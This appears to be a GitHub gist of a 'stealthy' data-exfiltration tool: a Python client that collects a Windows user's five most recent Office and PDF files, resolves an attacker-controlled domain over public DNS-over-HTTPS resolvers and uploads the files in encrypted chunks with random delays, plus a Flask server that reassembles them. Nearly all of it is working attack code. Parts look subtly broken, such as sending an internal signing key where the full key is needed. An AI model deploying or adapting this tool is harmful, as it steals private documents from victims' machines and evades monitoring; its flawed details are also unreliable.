Last active
April 27, 2025 08:24
-
-
Save 0xHossam/9e4966ed4d9fca0d56f699f366cd6e23 to your computer and use it in GitHub Desktop.
Data Exfiltration Using DNS over HTTPS (DoH) for HTTPS POST Requests & Sending Data in Chunks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Info: Stealthy Data Exfiltration Using (DoH) - Client Code | |
# Date: May 26, 2024 | |
# Author: Hossam | |
import os, glob, requests, logging, struct, base64, random, time, httpx | |
from datetime import datetime | |
import urllib3 | |
import win32com.client | |
from colorama import Fore, Style, init | |
from cryptography.fernet import Fernet | |
init(autoreset = True) | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
key = Fernet.generate_key() | |
cipher_suite = Fernet(key) | |
office_extensions = [ '.docx', '.xlsx', '.pptx', '.pdf' ] | |
CHUNK_SIZE = 1024 * 50 # 50 KB per chunk | |
DOH_URLS = [ | |
"https://cloudflare-dns.com/dns-query", | |
"https://dns.google/dns-query", | |
"https://dns.quad9.net/dns-query", | |
"https://dns.cloudflare.com/dns-query" | |
] | |
def resolve_shortcut(path): | |
shell = win32com.client.Dispatch( "WScript.Shell" ) | |
shortcut = shell.CreateShortCut( path ) | |
return shortcut.Targetpath | |
def get_recent_files(directory, number_of_files, extensions): | |
print( f"{Fore.CYAN}[ * ] Fetching recent files from {directory}" ) | |
shortcut_files = glob.glob( os.path.join( directory, '*.lnk' ) ) | |
shortcut_files.sort( key = lambda x: os.path.getmtime( x ), reverse = True ) | |
recent_files = [] | |
for shortcut in shortcut_files: | |
resolved_path = resolve_shortcut( shortcut ) | |
if any( resolved_path.lower().endswith( ext ) for ext in extensions ): | |
recent_files.append( resolved_path ) | |
if len( recent_files ) == number_of_files: | |
break | |
print( f"{Fore.GREEN}[ + ] Found recent files: {recent_files}" ) | |
return recent_files | |
def create_dns_query(domain): | |
transaction_id = os.urandom( 2 ) # Secure random transaction ID | |
flags = b'\x01\x00' # Standard query with recursion desired | |
questions = b'\x00\x01' # One question | |
answer_rrs = b'\x00\x00' # No answer resource records | |
authority_rrs = b'\x00\x00' # No authority resource records | |
additional_rrs = b'\x00\x00' # No additional resource records | |
query_type = b'\x00\x01' # Type A ( IPv4 address ) | |
query_class = b'\x00\x01' # Class IN ( Internet ) | |
labels = domain.split( '.' ) | |
query_body = b''.join( struct.pack( 'B', len( label ) ) + label.encode() for label in labels ) | |
query_body += b'\x00' # End of domain name | |
return transaction_id + flags + questions + answer_rrs + authority_rrs + additional_rrs + query_body + query_type + query_class | |
def doh_query(domain, doh_url): | |
query = create_dns_query( domain ) | |
headers = { | |
'Content-Type': 'application/dns-message', | |
'Accept': 'application/dns-message' | |
} | |
dns_query_b64 = base64.urlsafe_b64encode( query ).decode( 'utf-8' ).rstrip( '=' ) | |
full_url = f"{doh_url}?dns={dns_query_b64}" | |
with httpx.Client( http2 = True, verify = False ) as client: | |
response = client.get( full_url, headers = headers ) | |
response.raise_for_status() | |
data = response.content | |
print( f"{Fore.YELLOW}[ * ] Response Data > {data}" ) | |
return decode_dns_response( data ) | |
def random_delay(): | |
delay = random.uniform( 0.5, 2.0 ) # between 0.5 and 2.0 seconds | |
time.sleep( delay ) | |
def decode_dns_response(data): | |
try: | |
answer_start = 12 + data[12:].index( b'\x00' ) + 5 # Find end of the query section | |
name_pointer, type, class_, ttl, data_len = struct.unpack( '!HHHLH', data[answer_start:answer_start + 12] ) | |
address = struct.unpack( '!4s', data[answer_start + 12:answer_start + 12 + data_len] )[0] | |
ip_address = ".".join( map( str, address ) ) | |
print( f"{Fore.MAGENTA}[ * ] Answer section:" ) | |
print( f"{Fore.MAGENTA}\t [ + ] Name pointer: {name_pointer}" ) | |
print( f"{Fore.MAGENTA}\t [ + ] Type: {type}" ) | |
print( f"{Fore.MAGENTA}\t [ + ] Class: {class_}" ) | |
print( f"{Fore.MAGENTA}\t [ + ] TTL: {ttl}" ) | |
print( f"{Fore.MAGENTA}\t [ + ] Data length: {data_len}" ) | |
print( f"{Fore.MAGENTA}\t [ + ] IP Address: {ip_address}" ) | |
return ip_address | |
except Exception as e: | |
print( f"{Fore.RED}[ ! ] Failed to decode DNS response: {e}" ) | |
return None | |
def send_file_in_chunks(file_path, server_ip, cipher_suite): | |
try: | |
file_size = os.path.getsize( file_path ) | |
except FileNotFoundError: | |
print( f"{Fore.RED}[ ! ] File not found: {file_path}" ) | |
return | |
file_name = os.path.basename( file_path ) | |
server_url = f"https://{server_ip}:5000/upload" | |
with open( file_path, 'rb' ) as f: | |
for chunk_number in range( 0, file_size, CHUNK_SIZE ): | |
chunk_data = f.read( CHUNK_SIZE ) | |
encrypted_chunk = cipher_suite.encrypt( chunk_data ) | |
doh_url = random.choice( DOH_URLS ) | |
files = { | |
'file': ( file_name, encrypted_chunk ), | |
'chunk_number': ( None, str( chunk_number ) ), | |
'total_size': ( None, str( file_size ) ), | |
'key': ( None, base64.urlsafe_b64encode( cipher_suite._signing_key ).decode( 'utf-8' ) ) # Send the key | |
} | |
print( f"{Fore.CYAN}[ * ] Sending chunk {chunk_number // CHUNK_SIZE} of file {file_name}" ) | |
print( f"{Fore.CYAN}[ + ] Chunk size: {len( encrypted_chunk )} bytes, Memory address: {hex( id( encrypted_chunk ) )}" ) | |
print( f"{Fore.CYAN}[ * ] Using DoH provider: {doh_url}\n" ) | |
try: | |
response = requests.post( server_url, files = files, verify = False ) | |
if response.status_code == 200: | |
print( f"{Fore.GREEN}[ + ] Successfully uploaded chunk {chunk_number // CHUNK_SIZE} of {file_name}" ) | |
else: | |
print( f"{Fore.RED}[ ! ] Failed to upload chunk {chunk_number // CHUNK_SIZE} of {file_name}" ) | |
break | |
except requests.RequestException as e: | |
print( f"{Fore.RED}[ ! ] Error during upload: {e}" ) | |
random_delay() | |
if __name__ == "__main__": | |
recent_files_dir = r"C:\Users\hossam\AppData\Roaming\Microsoft\Windows\Recent" | |
recent_files = get_recent_files( recent_files_dir, 5, office_extensions ) # extract 5 most recent Office files | |
domain = "0xhossam-redteaming.com" | |
server_ip = None | |
for doh_url in DOH_URLS: | |
print( f"{Fore.CYAN}[ * ] Querying {domain} using DoH provider: {doh_url}" ) | |
server_ip = doh_query( domain, doh_url ) | |
if server_ip: | |
break | |
if server_ip: | |
print( f"{Fore.GREEN}[ + ] Resolved server IP: {server_ip}" ) | |
for recent_file in recent_files: | |
send_file_in_chunks( recent_file, server_ip, cipher_suite ) | |
else: | |
print( f"{Fore.RED}[ ! ] Failed to resolve server IP using DoH providers" ) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Author : Hossam Ehab | |
Info : Stealthy Data Exfiltration Using (DoH) - Server Code | |
Date : May 26, 2024 | |
""" | |
from flask import Flask, request, jsonify | |
import os | |
from cryptography.fernet import Fernet | |
import base64 | |
app = Flask( __name__ ) | |
UPLOAD_FOLDER = './uploads' | |
if not os.path.exists( UPLOAD_FOLDER ): | |
os.makedirs( UPLOAD_FOLDER ) | |
@app.route( '/upload', methods = [ 'POST' ] ) | |
def upload_file(): | |
file = request.files[ 'file' ] | |
chunk_number = int( request.form[ 'chunk_number' ] ) | |
total_size = int( request.form[ 'total_size' ] ) | |
key = base64.urlsafe_b64decode( request.form[ 'key' ] ) | |
cipher_suite = Fernet( key ) | |
filename = file.filename | |
encrypted_chunk = file.read() | |
chunk_data = cipher_suite.decrypt( encrypted_chunk ) | |
file_path = os.path.join( UPLOAD_FOLDER, filename ) | |
with open( file_path, 'ab' ) as f: | |
f.write( chunk_data ) | |
if os.path.getsize( file_path ) >= total_size: | |
print( f"Successfully received and reconstructed file: {filename}" ) | |
return jsonify( { 'status': 'success', 'chunk_number': chunk_number } ), 200 | |
if __name__ == '__main__': | |
app.run( host = '0.0.0.0', port = 5000, ssl_context = ( 'path/to/your/cert.pem', 'path/to/your/key.pem' ) ) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment